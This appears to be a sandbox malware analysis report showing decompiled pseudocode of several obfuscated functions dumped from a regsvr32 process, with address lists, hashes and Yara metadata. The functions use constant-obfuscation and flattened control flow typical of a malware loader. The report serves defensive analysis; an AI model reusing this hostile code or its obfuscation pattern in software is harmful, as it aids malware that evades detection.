				_v92 = _v92 ^ 0x5142f68a;
				_v44 = 0x9e1c18;
				_v44 = _v44 + 0xffffb872;
				_v44 = _v44 ^ 0x009a00d0;
				_v96 = 0xaed889;
				_v96 = _v96 | 0x8a23a869;
				_t236 = 0x47;
				_v96 = _v96 * 0x28;
				_v96 = _v96 << 4;
				_v96 = _v96 ^ 0xb7ed64c0;
				_v100 = 0x57df08;
				_v100 = _v100 + 0xcb9c;
				_v100 = _v100 << 0x10;
				_v100 = _v100 + 0x59cb;
				_v100 = _v100 ^ 0xaaab0961;
				_v36 = 0xb6304c;
				_v36 = _v36 | 0xc9bce40a;
				_v36 = _v36 ^ 0xc9b68fdf;
				_v76 = 0xa4d90f;
				_v76 = _v76 * 7;
				_v76 = _v76 + 0x1d90;
				_v76 = _v76 ^ 0x04850091;
				_v40 = 0xbbd16e;
				_v40 = _v40 + 0xffffd9dd;
				_v40 = _v40 ^ 0x00bcead5;
				_v84 = 0x3e6012;
				_t242 = _v8;
				_v84 = _v84 / _t236;
				_v84 = _v84 >> 0xf;
				_t237 = _v4;
				_t216 = _v8;
				_v84 = _v84 * 0x28;
				_v84 = _v84 ^ 0x00087ad1;
				_v88 = 0xd18c9c;
				_v88 = _v88 ^ 0x98cb43ad;
				_v88 = _v88 >> 2;
				_v88 = _v88 * 0x62;
				_v88 = _v88 ^ 0x8e90d09f;
				_t198 = _v28;
				_v80 = 0x50b24f;
				_v80 = _v80 + 0xfffff7da;
				_v80 = _v80 >> 4;
				_v80 = _v80 + 0xdd34;
				_v80 = _v80 ^ 0x000de38c;
				_v32 = 0xa82c31;
				_v32 = _v32 << 4;
				_v32 = _v32 ^ 0x0a8f67d3;
				while(_t239 != 0xcc5ade) {
					if(_t239 == 0xb71bd21) {
						_t219 = E001B19B1(_v104,  &_v16, _v48, _v52, _t242, _t217, _t198, _v56);
						_t243 =  &(_t243[6]);
						_v24 = _t219;
						if(_t219 == 0) {
							_t240 = _v24;
							goto L19;
						} else {
							_t222 = _v16;
							if(_t222 == 0) {
								goto L15;
							} else {
								_t198 = _v28 + _t222;
								_v28 = _v28 + _t222;
								_t242 = _t242 - _t222;
								if(_t242 != 0) {
									goto L6;
								} else {
									_t223 = _t237 + _t237;
									_push(_t223);
									_v12 = _t223;
									_t241 = E001A303A(_t223, _t223);
									_t244 =  &(_t243[3]);
									if(_t241 == 0) {
										goto L15;
									} else {
										E001BFD42(_t237, _v36, _t216, _v76, _t241, _v40);
										E001B17D2(_v84, _v88, _t216);
										_t242 = _t237;
										_t198 = _t241 + _t237;
										_t237 = _v12;
										_t243 =  &(_t244[5]);
										_v28 = _t198;
										_t216 = _t241;
										if(_t242 == 0) {
											goto L15;
										} else {
											goto L6;
										}
									}
								}
							}
						}
					} else {
						if(_t239 != 0xe2c6127) {
							L14:
							if(_t239 != 0x888cc21) {
								continue;
							} else {
								goto L15;
							}
						} else {
							_t237 = 0x10000;
							_push(_t217);
							_t198 = E001A303A(_t217, 0x10000);
							_t216 = _t198;
							_t243 =  &(_t243[3]);
							if(_t216 == 0) {
								L15:
								_t240 = _v24;
								if(_t240 == 0) {
									L19:
									E001B17D2(_v80, _v32, _t216);
								} else {
									_t203 = _v8;
									 *_t203 = _t216;
									 *((intOrPtr*)(_t203 + 4)) = _t237 - _t242;
								}
							} else {
								_v28 = _t198;
								_t242 = 0x10000;
								L6:
								_t217 = _v20;
								_t239 = 0xb71bd21;
								continue;
							}
						}
					}
					return _t240;
				}
				_t239 = 0xe2c6127;
				goto L14;
			}













































                                                                                                                0x001b35a3
                                                                                                                0x001b35a3
                                                                                                                0x001b35aa
                                                                                                                0x001b35ae
                                                                                                                0x001b35b2
                                                                                                                0x001b35ba
                                                                                                                0x001b35c7
                                                                                                                0x001b35cb
                                                                                                                0x001b35d0
                                                                                                                0x001b35d8
                                                                                                                0x001b35e0
                                                                                                                0x001b35e8
                                                                                                                0x001b35f0
                                                                                                                0x001b35f8
                                                                                                                0x001b35fd
                                                                                                                0x001b3605
                                                                                                                0x001b360d
                                                                                                                0x001b3612
                                                                                                                0x001b361a
                                                                                                                0x001b3622
                                                                                                                0x001b362a
                                                                                                                0x001b3632
                                                                                                                0x001b3637
                                                                                                                0x001b363f
                                                                                                                0x001b3647
                                                                                                                0x001b364f
                                                                                                                0x001b3657
                                                                                                                0x001b365f
                                                                                                                0x001b3667
                                                                                                                0x001b366f
                                                                                                                0x001b3677
                                                                                                                0x001b367f
                                                                                                                0x001b3687
                                                                                                                0x001b368f
                                                                                                                0x001b3697
                                                                                                                0x001b36a7
                                                                                                                0x001b36aa
                                                                                                                0x001b36af
                                                                                                                0x001b36b3
                                                                                                                0x001b36bb
                                                                                                                0x001b36c3
                                                                                                                0x001b36cb
                                                                                                                0x001b36d3
                                                                                                                0x001b36d8
                                                                                                                0x001b36e0
                                                                                                                0x001b36e8
                                                                                                                0x001b36f0
                                                                                                                0x001b36f8
                                                                                                                0x001b3700
                                                                                                                0x001b370f
                                                                                                                0x001b3710
                                                                                                                0x001b3714
                                                                                                                0x001b3719
                                                                                                                0x001b3721
                                                                                                                0x001b3729
                                                                                                                0x001b3731
                                                                                                                0x001b3736
                                                                                                                0x001b373e
                                                                                                                0x001b3746
                                                                                                                0x001b374e
                                                                                                                0x001b3756
                                                                                                                0x001b375e
                                                                                                                0x001b376b
                                                                                                                0x001b376f
                                                                                                                0x001b3777
                                                                                                                0x001b377f
                                                                                                                0x001b3787
                                                                                                                0x001b378f
                                                                                                                0x001b3799
                                                                                                                0x001b37a7
                                                                                                                0x001b37ab
                                                                                                                0x001b37af
                                                                                                                0x001b37b9
                                                                                                                0x001b37bd
                                                                                                                0x001b37c1
                                                                                                                0x001b37c5
                                                                                                                0x001b37cd
                                                                                                                0x001b37d5
                                                                                                                0x001b37dd
                                                                                                                0x001b37e7
                                                                                                                0x001b37eb
                                                                                                                0x001b37f3
                                                                                                                0x001b37f7
                                                                                                                0x001b37ff
                                                                                                                0x001b3807
                                                                                                                0x001b380c
                                                                                                                0x001b3814
                                                                                                                0x001b381c
                                                                                                                0x001b3824
                                                                                                                0x001b3829
                                                                                                                0x001b3831
                                                                                                                0x001b3843
                                                                                                                0x001b38a8
                                                                                                                0x001b38aa
                                                                                                                0x001b38ad
                                                                                                                0x001b38b3
                                                                                                                0x001b396a
                                                                                                                0x00000000
                                                                                                                0x001b38b9
                                                                                                                0x001b38b9
                                                                                                                0x001b38bf
                                                                                                                0x00000000
                                                                                                                0x001b38c5
                                                                                                                0x001b38c9
                                                                                                                0x001b38cb
                                                                                                                0x001b38cf
                                                                                                                0x001b38d1
                                                                                                                0x00000000
                                                                                                                0x001b38d3
                                                                                                                0x001b38d7
                                                                                                                0x001b38e6
                                                                                                                0x001b38e9
                                                                                                                0x001b38f2
                                                                                                                0x001b38f4
                                                                                                                0x001b38f9
                                                                                                                0x00000000
                                                                                                                0x001b38fb
                                                                                                                0x001b390b
                                                                                                                0x001b3919
                                                                                                                0x001b391e
                                                                                                                0x001b3920
                                                                                                                0x001b3923
                                                                                                                0x001b392a
                                                                                                                0x001b392d
                                                                                                                0x001b3931
                                                                                                                0x001b3935
                                                                                                                0x00000000
                                                                                                                0x001b3937
                                                                                                                0x00000000
                                                                                                                0x001b3937
                                                                                                                0x001b3935
                                                                                                                0x001b38f9
                                                                                                                0x001b38d1
                                                                                                                0x001b38bf
                                                                                                                0x001b3845
                                                                                                                0x001b384b
                                                                                                                0x001b3941
                                                                                                                0x001b3947
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b3851
                                                                                                                0x001b3855
                                                                                                                0x001b3866
                                                                                                                0x001b3869
                                                                                                                0x001b386e
                                                                                                                0x001b3870
                                                                                                                0x001b3875
                                                                                                                0x001b394d
                                                                                                                0x001b394d
                                                                                                                0x001b3953
                                                                                                                0x001b396e
                                                                                                                0x001b3977
                                                                                                                0x001b3955
                                                                                                                0x001b3955
                                                                                                                0x001b395b
                                                                                                                0x001b395d
                                                                                                                0x001b395d
                                                                                                                0x001b387b
                                                                                                                0x001b387b
                                                                                                                0x001b387f
                                                                                                                0x001b3881
                                                                                                                0x001b3881
                                                                                                                0x001b3885
                                                                                                                0x00000000
                                                                                                                0x001b3885
                                                                                                                0x001b3875
                                                                                                                0x001b384b
                                                                                                                0x001b3969
                                                                                                                0x001b3969
                                                                                                                0x001b393c
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: [A
                                                                                                                • API String ID: 0-1337053708
                                                                                                                • Opcode ID: 2df50b8a457a62284f47b4bef2842306c5353f661bbadacc302428e25ed516ad
                                                                                                                • Instruction ID: c3e6c28b61007d024307e852ad768ff699f18ae79b750be66c347c296042f5ec
                                                                                                                • Opcode Fuzzy Hash: 2df50b8a457a62284f47b4bef2842306c5353f661bbadacc302428e25ed516ad
                                                                                                                • Instruction Fuzzy Hash: 83A10EB15093819FC368DF2AC58944BFBE0FBD4B58F004A1DF9A596220D3B4DA49CF82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BDF2B Relevance: 1.4, Strings: 1, Instructions: 127COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E001BDF2B(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t106;
				intOrPtr _t114;
				void* _t117;
				void* _t121;
				intOrPtr* _t132;
				void* _t133;
				signed int _t134;
				signed int* _t137;

				_t119 = _a8;
				_push(_a16);
				_t132 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t106);
				_v64 = 0xda99f;
				_t137 =  &(( &_v84)[6]);
				_v64 = _v64 >> 0xa;
				_t133 = 0;
				_t121 = 0xc08d029;
				_t134 = 0x24;
				_v64 = _v64 / _t134;
				_v64 = _v64 ^ 0x00000018;
				_v60 = 0x7da1a;
				_v60 = _v60 | 0xc1a476a1;
				_v60 = _v60 + 0xffffc049;
				_v60 = _v60 ^ 0xc1a7bf04;
				_v84 = 0x8ea480;
				_v84 = _v84 + 0xffff45ae;
				_v84 = _v84 * 0x30;
				_v84 = _v84 + 0x7c1f;
				_v84 = _v84 ^ 0x1a9f4911;
				_v68 = 0xf07d5b;
				_v68 = _v68 << 2;
				_v68 = _v68 | 0x6f0b3482;
				_v68 = _v68 ^ 0x6fc29cb2;
				_v72 = 0x80888;
				_v72 = _v72 + 0xffff5dbf;
				_v72 = _v72 | 0x7412998f;
				_v72 = _v72 ^ 0x74107827;
				_v56 = 0xe8f879;
				_v56 = _v56 | 0xb0989566;
				_v56 = _v56 ^ 0xb0f2f86f;
				_v40 = 0x741eab;
				_v40 = _v40 * 0x30;
				_v40 = _v40 ^ 0x15c2356b;
				_v44 = 0xb979e7;
				_v44 = _v44 ^ 0x292234c1;
				_v44 = _v44 ^ 0x299ef497;
				_v76 = 0x914b48;
				_v76 = _v76 << 5;
				_v76 = _v76 + 0x8cd2;
				_v76 = _v76 ^ 0x1228d261;
				_v80 = 0xf1d869;
				_v80 = _v80 >> 2;
				_v80 = _v80 << 0xb;
				_v80 = _v80 ^ 0xe651db24;
				_v80 = _v80 ^ 0x05e5db94;
				_v48 = 0xc3728a;
				_v48 = _v48 + 0xb4f4;
				_v48 = _v48 ^ 0x00cfff4f;
				_v52 = 0x7de609;
				_v52 = _v52 + 0x31a2;
				_v52 = _v52 ^ 0x0071663e;
				do {
					while(_t121 != 0x40ccc02) {
						if(_t121 == 0x4e4cbe0) {
							_push(_t121);
							_t117 = E001BAF0B( &_v36, _v84, _v68, _v72,  *_t132,  *((intOrPtr*)(_t132 + 4)), _v56);
							_t137 =  &(_t137[6]);
							if(_t117 != 0) {
								_t121 = 0x40ccc02;
								continue;
							}
						} else {
							if(_t121 != 0xc08d029) {
								goto L8;
							} else {
								_t121 = 0x4e4cbe0;
								continue;
							}
						}
						goto L9;
					}
					_t114 =  *0x1c4208; // 0x0
					E001AA762( *_t119, _v40, _v64, _v44,  *((intOrPtr*)(_t114 + 0x14)),  &_v36, _v76, _t121, _v80, _t121, _v48,  *((intOrPtr*)(_t119 + 4)), _v52);
					_t137 =  &(_t137[0xb]);
					_t121 = 0xabdbc9a;
					_t133 =  ==  ? 1 : _t133;
					L8:
				} while (_t121 != 0xabdbc9a);
				L9:
				return _t133;
			}
























                                                                                                                0x001bdf2f
                                                                                                                0x001bdf36
                                                                                                                0x001bdf3a
                                                                                                                0x001bdf3c
                                                                                                                0x001bdf40
                                                                                                                0x001bdf41
                                                                                                                0x001bdf45
                                                                                                                0x001bdf46
                                                                                                                0x001bdf47
                                                                                                                0x001bdf4c
                                                                                                                0x001bdf54
                                                                                                                0x001bdf57
                                                                                                                0x001bdf62
                                                                                                                0x001bdf64
                                                                                                                0x001bdf6b
                                                                                                                0x001bdf73
                                                                                                                0x001bdf77
                                                                                                                0x001bdf7c
                                                                                                                0x001bdf84
                                                                                                                0x001bdf8c
                                                                                                                0x001bdf94
                                                                                                                0x001bdf9c
                                                                                                                0x001bdfa4
                                                                                                                0x001bdfb1
                                                                                                                0x001bdfb5
                                                                                                                0x001bdfbd
                                                                                                                0x001bdfc5
                                                                                                                0x001bdfcd
                                                                                                                0x001bdfd2
                                                                                                                0x001bdfda
                                                                                                                0x001bdfe2
                                                                                                                0x001bdfea
                                                                                                                0x001bdff2
                                                                                                                0x001bdffa
                                                                                                                0x001be002
                                                                                                                0x001be00a
                                                                                                                0x001be012
                                                                                                                0x001be01a
                                                                                                                0x001be027
                                                                                                                0x001be02b
                                                                                                                0x001be033
                                                                                                                0x001be03b
                                                                                                                0x001be043
                                                                                                                0x001be04b
                                                                                                                0x001be05b
                                                                                                                0x001be060
                                                                                                                0x001be068
                                                                                                                0x001be070
                                                                                                                0x001be078
                                                                                                                0x001be07d
                                                                                                                0x001be082
                                                                                                                0x001be08a
                                                                                                                0x001be092
                                                                                                                0x001be09a
                                                                                                                0x001be0a2
                                                                                                                0x001be0aa
                                                                                                                0x001be0b2
                                                                                                                0x001be0ba
                                                                                                                0x001be0c2
                                                                                                                0x001be0c2
                                                                                                                0x001be0cc
                                                                                                                0x001be0dd
                                                                                                                0x001be0f7
                                                                                                                0x001be0fc
                                                                                                                0x001be101
                                                                                                                0x001be103
                                                                                                                0x00000000
                                                                                                                0x001be103
                                                                                                                0x001be0ce
                                                                                                                0x001be0d4
                                                                                                                0x00000000
                                                                                                                0x001be0d6
                                                                                                                0x001be0d6
                                                                                                                0x00000000
                                                                                                                0x001be0d6
                                                                                                                0x001be0d4
                                                                                                                0x00000000
                                                                                                                0x001be0cc
                                                                                                                0x001be121
                                                                                                                0x001be137
                                                                                                                0x001be145
                                                                                                                0x001be14a
                                                                                                                0x001be14f
                                                                                                                0x001be152
                                                                                                                0x001be152
                                                                                                                0x001be15f
                                                                                                                0x001be167

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: >fq
                                                                                                                • API String ID: 0-3306265603
                                                                                                                • Opcode ID: a05eb2dc0a9616a35f7017b4a161f0929380aa1587c5c6b1209ab06a9c79186b
                                                                                                                • Instruction ID: 5fbcfefbe42939c10aaeed87ca6bd4e8fe0365d219bca63fa7292153f34466be
                                                                                                                • Opcode Fuzzy Hash: a05eb2dc0a9616a35f7017b4a161f0929380aa1587c5c6b1209ab06a9c79186b
                                                                                                                • Instruction Fuzzy Hash: 56512171508301AFC759DF25C98A85BBBF1FBD8718F805A1CF58692220D3B1CA49CF82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001C1A0A Relevance: 1.4, Strings: 1, Instructions: 124COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E001C1A0A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v80;
				char _v600;
				void* _t105;
				void* _t118;
				void* _t125;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				void* _t144;
				void* _t145;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t105);
				_v36 = 0x5dad20;
				_t145 = _t144 + 0x14;
				_t125 = 0x219ea1;
				_t140 = 0x11;
				_v36 = _v36 * 0x5a;
				_v36 = _v36 ^ 0x20eedd50;
				_v40 = 0xa34fb8;
				_v40 = _v40 ^ 0x8ad5a020;
				_v40 = _v40 ^ 0x8a713a86;
				_v24 = 0xab86fb;
				_v24 = _v24 | 0x85d38fb4;
				_v24 = _v24 + 0x41bb;
				_v24 = _v24 ^ 0x85fb527d;
				_v44 = 0x5fcc97;
				_v44 = _v44 ^ 0x2eb67f47;
				_v44 = _v44 ^ 0x2ee1d799;
				_v20 = 0x6a4326;
				_v20 = _v20 * 0x2d;
				_v20 = _v20 | 0xd1799313;
				_v20 = _v20 ^ 0xd3fc0f70;
				_v16 = 0x14e0aa;
				_v16 = _v16 + 0xffffc7ea;
				_v16 = _v16 + 0xffff6e14;
				_v16 = _v16 / _t140;
				_v16 = _v16 ^ 0x0005f511;
				_v48 = 0xf3b4c6;
				_t141 = 0x49;
				_v48 = _v48 / _t141;
				_v48 = _v48 ^ 0x000d5b98;
				_v32 = 0x6c9aa5;
				_v32 = _v32 | 0x46704315;
				_v32 = _v32 ^ 0x467eff73;
				_v28 = 0x100ef2;
				_v28 = _v28 + 0x93d1;
				_v28 = _v28 + 0xffffcead;
				_v28 = _v28 ^ 0x00119808;
				_v8 = 0xcacd69;
				_t142 = 0x22;
				_v8 = _v8 * 0x24;
				_v8 = _v8 ^ 0x98d02f57;
				_v8 = _v8 + 0xb742;
				_v8 = _v8 ^ 0x8458190c;
				_v12 = 0x686ff5;
				_v12 = _v12 * 0x7f;
				_v12 = _v12 >> 9;
				_v12 = _v12 / _t142;
				_v12 = _v12 ^ 0x000a036a;
				do {
					while(_t125 != 0x219ea1) {
						if(_t125 == 0x5c9bf8a) {
							_t118 = E001A94D4(_v20, _v16, _v48, _t125, _v32,  &_v600);
							_t145 = _t145 + 0x10;
							_t125 = 0x7b597ae;
							continue;
						}
						if(_t125 != 0x7b597ae) {
							goto L8;
						}
						return E001A33B6(_v28, _a12, _t125, _v8, _v12,  &_v600,  &_v80);
					}
					_t118 = E001B25CD(_v40, _v24, _v36, _v44,  &_v80);
					_t145 = _t145 + 0xc;
					_t125 = 0x5c9bf8a;
					L8:
				} while (_t125 != 0xa97d2c4);
				return _t118;
			}
























                                                                                                                0x001c1a16
                                                                                                                0x001c1a19
                                                                                                                0x001c1a1c
                                                                                                                0x001c1a1f
                                                                                                                0x001c1a20
                                                                                                                0x001c1a21
                                                                                                                0x001c1a26
                                                                                                                0x001c1a2d
                                                                                                                0x001c1a40
                                                                                                                0x001c1a44
                                                                                                                0x001c1a45
                                                                                                                0x001c1a48
                                                                                                                0x001c1a4f
                                                                                                                0x001c1a56
                                                                                                                0x001c1a5d
                                                                                                                0x001c1a64
                                                                                                                0x001c1a6b
                                                                                                                0x001c1a72
                                                                                                                0x001c1a79
                                                                                                                0x001c1a80
                                                                                                                0x001c1a87
                                                                                                                0x001c1a8e
                                                                                                                0x001c1a95
                                                                                                                0x001c1aa2
                                                                                                                0x001c1aa5
                                                                                                                0x001c1aac
                                                                                                                0x001c1ab3
                                                                                                                0x001c1aba
                                                                                                                0x001c1ac1
                                                                                                                0x001c1acf
                                                                                                                0x001c1ad2
                                                                                                                0x001c1ad9
                                                                                                                0x001c1ae3
                                                                                                                0x001c1ae8
                                                                                                                0x001c1aed
                                                                                                                0x001c1af4
                                                                                                                0x001c1afb
                                                                                                                0x001c1b02
                                                                                                                0x001c1b09
                                                                                                                0x001c1b10
                                                                                                                0x001c1b17
                                                                                                                0x001c1b1e
                                                                                                                0x001c1b25
                                                                                                                0x001c1b30
                                                                                                                0x001c1b31
                                                                                                                0x001c1b34
                                                                                                                0x001c1b3b
                                                                                                                0x001c1b42
                                                                                                                0x001c1b49
                                                                                                                0x001c1b54
                                                                                                                0x001c1b57
                                                                                                                0x001c1b65
                                                                                                                0x001c1b68
                                                                                                                0x001c1b6f
                                                                                                                0x001c1b6f
                                                                                                                0x001c1b75
                                                                                                                0x001c1bb6
                                                                                                                0x001c1bbb
                                                                                                                0x001c1bbe
                                                                                                                0x00000000
                                                                                                                0x001c1bbe
                                                                                                                0x001c1b79
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c1b98
                                                                                                                0x001c1bd2
                                                                                                                0x001c1bd7
                                                                                                                0x001c1bda
                                                                                                                0x001c1bdc
                                                                                                                0x001c1bdc
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: &Cj
                                                                                                                • API String ID: 0-3048372160
                                                                                                                • Opcode ID: d7484a658b88edb967a0cc4a66cb019a3fcb705f29091c344cf0e0ec6a1b9aa4
                                                                                                                • Instruction ID: 185cfb083c8ac7c16dcdc1f9d81e10f1ec064dc7778e3d3eb6a0124178de8744
                                                                                                                • Opcode Fuzzy Hash: d7484a658b88edb967a0cc4a66cb019a3fcb705f29091c344cf0e0ec6a1b9aa4
                                                                                                                • Instruction Fuzzy Hash: F25125B2D0020DEBCF08DFE5C9869EEBBB6FF58314F108199E511B6260E7745A458FA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A188C Relevance: 1.4, Strings: 1, Instructions: 105COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E001A188C(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t75;
				void* _t80;
				void* _t82;
				intOrPtr _t95;
				signed int* _t98;

				_t70 = __eax;
				_t94 = _a8;
				_t80 = __edx;
				_push(_a8);
				_push(_a4);
				 *__eax =  *__eax + __eax;
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t70);
				_v76 = 0xb27d2c;
				_t95 = 0;
				_v72 = 0xea864d;
				_t98 =  &(( &_v108)[4]);
				_v68 = 0x1f2dab;
				_t82 = 0x3ac7409;
				_v64 = 0;
				_v92 = 0x191778;
				_v92 = _v92 | 0xa20a80f7;
				_v92 = _v92 ^ 0xa216246b;
				_v100 = 0xa964d4;
				_v100 = _v100 + 0x8b05;
				_v100 = _v100 + 0xffff7529;
				_v100 = _v100 ^ 0x00ad9bce;
				_v104 = 0x46ba3c;
				_v104 = _v104 | 0xb6256e3b;
				_v104 = _v104 * 0x21;
				_v104 = _v104 ^ 0x8361d7ca;
				_v88 = 0x81c27d;
				_v88 = _v88 * 0x68;
				_v88 = _v88 ^ 0x34bbe2dd;
				_v96 = 0xcb4588;
				_v96 = _v96 + 0x9f78;
				_v96 = _v96 >> 0xd;
				_v96 = _v96 ^ 0x0003c6e6;
				_v108 = 0x8ce280;
				_v108 = _v108 ^ 0x62397b6a;
				_v108 = _v108 ^ 0x5c51708f;
				_v108 = _v108 ^ 0x0d69e953;
				_v108 = _v108 ^ 0x338347c6;
				_v80 = 0x92c06b;
				_v80 = _v80 ^ 0x00901884;
				_v84 = 0xe644d6;
				_v84 = _v84 << 0xd;
				_v84 = _v84 ^ 0xc899afdb;
				do {
					while(_t82 != 0x274709f) {
						if(_t82 == 0x3ac7409) {
							_t82 = 0x3eb1887;
							continue;
						} else {
							if(_t82 == 0x3eb1887) {
								E001A6DD9( &_v60, _v92, _v100, _t80, _v104);
								_t98 =  &(_t98[3]);
								_t82 = 0x274709f;
								continue;
							} else {
								_t103 = _t82 - 0xa1a2c51;
								if(_t82 != 0xa1a2c51) {
									goto L13;
								} else {
									E001AA903(_v80, _t94 + 0x20, _t103, _v84,  &_v60);
									_t95 =  !=  ? 1 : _t95;
								}
							}
						}
						L7:
						return _t95;
					}
					_t75 = E001B6D3A( &_v60, _t94 + 0x1c, _v88, _v96, _v108);
					_t98 =  &(_t98[3]);
					__eflags = _t75;
					if(__eflags == 0) {
						_t82 = 0x38dd9d8;
						goto L13;
					} else {
						_t82 = 0xa1a2c51;
						continue;
					}
					goto L7;
					L13:
					__eflags = _t82 - 0x38dd9d8;
				} while (__eflags != 0);
				goto L7;
			}





















                                                                                                                0x001a188c
                                                                                                                0x001a1893
                                                                                                                0x001a189a
                                                                                                                0x001a189c
                                                                                                                0x001a189d
                                                                                                                0x001a18a2
                                                                                                                0x001a18a4
                                                                                                                0x001a18a5
                                                                                                                0x001a18a6
                                                                                                                0x001a18ab
                                                                                                                0x001a18b3
                                                                                                                0x001a18b5
                                                                                                                0x001a18bd
                                                                                                                0x001a18c0
                                                                                                                0x001a18c8
                                                                                                                0x001a18cd
                                                                                                                0x001a18d6
                                                                                                                0x001a18de
                                                                                                                0x001a18e6
                                                                                                                0x001a18ee
                                                                                                                0x001a18f6
                                                                                                                0x001a18fe
                                                                                                                0x001a1906
                                                                                                                0x001a190e
                                                                                                                0x001a1916
                                                                                                                0x001a1923
                                                                                                                0x001a1927
                                                                                                                0x001a192f
                                                                                                                0x001a193c
                                                                                                                0x001a1940
                                                                                                                0x001a1948
                                                                                                                0x001a1950
                                                                                                                0x001a1958
                                                                                                                0x001a195d
                                                                                                                0x001a1965
                                                                                                                0x001a196d
                                                                                                                0x001a1975
                                                                                                                0x001a197d
                                                                                                                0x001a1985
                                                                                                                0x001a198d
                                                                                                                0x001a199d
                                                                                                                0x001a19a5
                                                                                                                0x001a19ad
                                                                                                                0x001a19b2
                                                                                                                0x001a19ba
                                                                                                                0x001a19ba
                                                                                                                0x001a19c8
                                                                                                                0x001a1a1f
                                                                                                                0x00000000
                                                                                                                0x001a19ca
                                                                                                                0x001a19cc
                                                                                                                0x001a1a10
                                                                                                                0x001a1a15
                                                                                                                0x001a1a18
                                                                                                                0x00000000
                                                                                                                0x001a19ce
                                                                                                                0x001a19ce
                                                                                                                0x001a19d4
                                                                                                                0x00000000
                                                                                                                0x001a19d6
                                                                                                                0x001a19e6
                                                                                                                0x001a19f2
                                                                                                                0x001a19f2
                                                                                                                0x001a19d4
                                                                                                                0x001a19cc
                                                                                                                0x001a19f6
                                                                                                                0x001a19fe
                                                                                                                0x001a19fe
                                                                                                                0x001a1a36
                                                                                                                0x001a1a3b
                                                                                                                0x001a1a3e
                                                                                                                0x001a1a40
                                                                                                                0x001a1a4c
                                                                                                                0x00000000
                                                                                                                0x001a1a42
                                                                                                                0x001a1a42
                                                                                                                0x00000000
                                                                                                                0x001a1a42
                                                                                                                0x00000000
                                                                                                                0x001a1a51
                                                                                                                0x001a1a51
                                                                                                                0x001a1a51
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
